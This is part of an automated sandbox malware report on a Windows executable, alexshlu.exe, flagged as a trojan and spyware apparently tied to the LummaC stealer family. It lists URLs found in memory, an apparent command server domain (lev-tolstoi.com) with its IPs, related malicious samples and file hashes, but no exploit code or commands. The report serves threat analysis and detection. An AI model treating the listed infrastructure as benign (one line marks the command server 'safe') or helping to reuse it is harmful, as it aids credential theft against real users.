                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bralexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.youtube.com/alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.comHI2alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://store.steampowered.com/privacy_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lev-tolstoi.com:443/apilalexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/recaptcha/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://checkout.steampowered.com/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgalexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/;alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/about/alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.steampowered.com/en/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/market/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/news/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://lev-tolstoi.com/apiralexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYialexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/discussions/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/stats/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://medal.tvalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/Galexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://x1.c.lencr.org/0alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://x1.i.lencr.org/0alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchalexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aalexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=ealexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=ealexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1577338
                                                                                                                                                                                                              Start date and time:2024-12-18 12:07:09 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 4m 31s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:alexshlu.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/0@11/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                                              • Number of executed functions: 46
                                                                                                                                                                                                              • Number of non-executed functions: 158
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              06:08:00API Interceptor13x Sleep call for process: alexshlu.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              172.67.157.254ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                https://t.co/nq9BYOxCg9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  23.55.153.10699awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                        1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      lev-tolstoi.com5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      steamcommunity.com99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      AKAMAI-ASN1EU99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.44.201.32
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.218.93.195
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                      • 23.43.121.120
                                                                                                                                                                                                                                      CLOUDFLARENETUSrandom.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.64.80
                                                                                                                                                                                                                                      https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.66.0.145
                                                                                                                                                                                                                                      https://www.ispringsolutions.com/ispring-suiteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.52.161
                                                                                                                                                                                                                                      Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.10.224
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.23.76
                                                                                                                                                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                      • 172.67.191.110

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e199awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      No created / dropped files found

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.805439259889939
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:alexshlu.exe
                                                                                                                                                                                                                                      File size:828'416 bytes
                                                                                                                                                                                                                                      MD5:9821fa45714f3b4538cc017320f6f7e5
                                                                                                                                                                                                                                      SHA1:5bf0752889cefd64dab0317067d5e593ba32e507
                                                                                                                                                                                                                                      SHA256:fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
                                                                                                                                                                                                                                      SHA512:90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898
                                                                                                                                                                                                                                      SSDEEP:12288:63+0sQQRz2L8CqyGAuDi5r5jBlhyyZzWDtkfDdEIHiyo+rBlhyyZzWDtkfDdEIHd:6BqSL8CWopBCyqXIdRBCyqXIdb
                                                                                                                                                                                                                                      TLSH:84050141B8C14472C46326328C74E7BA5B3EF9744F31AEDBE3A45A3DDA316C18735A4A
                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Vg............................r.............@.................................s.....@..................................<..<..

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x40e572
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
